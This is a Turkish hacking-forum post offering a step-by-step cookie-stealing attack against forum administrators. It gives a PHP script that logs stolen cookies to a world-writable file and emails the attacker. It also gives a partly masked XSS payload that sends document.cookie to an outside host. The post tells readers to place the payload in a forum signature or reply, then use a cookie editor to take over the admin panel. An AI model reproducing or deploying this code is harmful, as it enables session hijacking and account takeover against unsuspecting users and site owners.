adminin cookielerini çal

spedohymer

Katılımcı Üye
15 Eki 2007
835
15
Network / Türkiye
Herhangi bir sıste****n etkılenmesı ıcın
HTML:
 kodları acık olmalıdır.

Notepad'i açıp Cookie leri almak için once gerekli kodları yazıyoruz. [php]

Kod:


Kod:
<?php 
$kayit = fopen("procookies.txt","a"); 
foreach($_GET as $variable => $value) { 
fwrite($kayit,$variable . ": " . $value . "\n"); 
} 
fwrite($kayit,"---------------------------\n"); 
fclose($kayit); 
mail("[email protected]","Cookies","http://www.ornek.com/procookies.txt",'From: [email protected]'); 
?>

dosyayı cookie.php olarak kaydediyoruz, ftp ye atıyoruz..

procookies.txt dosyası olusturup aynı dizine atıyoruz, [Chmod degerini 777 yapıyoruz]

Kod:



Kod:
******************.href='http://www.ornek.com/cookie.php?c='+escape(********.cookie)</SCRIPT>


Forumda kullanmak istiyorsanız bu kodu kullanıcı panelinden imza olarak direk atıyorsunuz. Başka [html] destekleyen sistemdede istediğiniz gibi kullanabilirsiniz. Örneğin bir forum sisteminde uyguladığımızda, bir konuya cevap yazıyorsunuz.. Konuya girenin cookie bilgileri direk "procookies.txt" dosyasına gidiyor. Cookie leri aldıktan sonra "Cookie Editor" gibi bir program kullanarak admin bilgilerini duzenleyin boylece direk panele ulasabılırsınız.

Daha sonra Yonetici Paneline ulasabilirsiniz.
 
alıntı.
 
++rep  lütfen
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.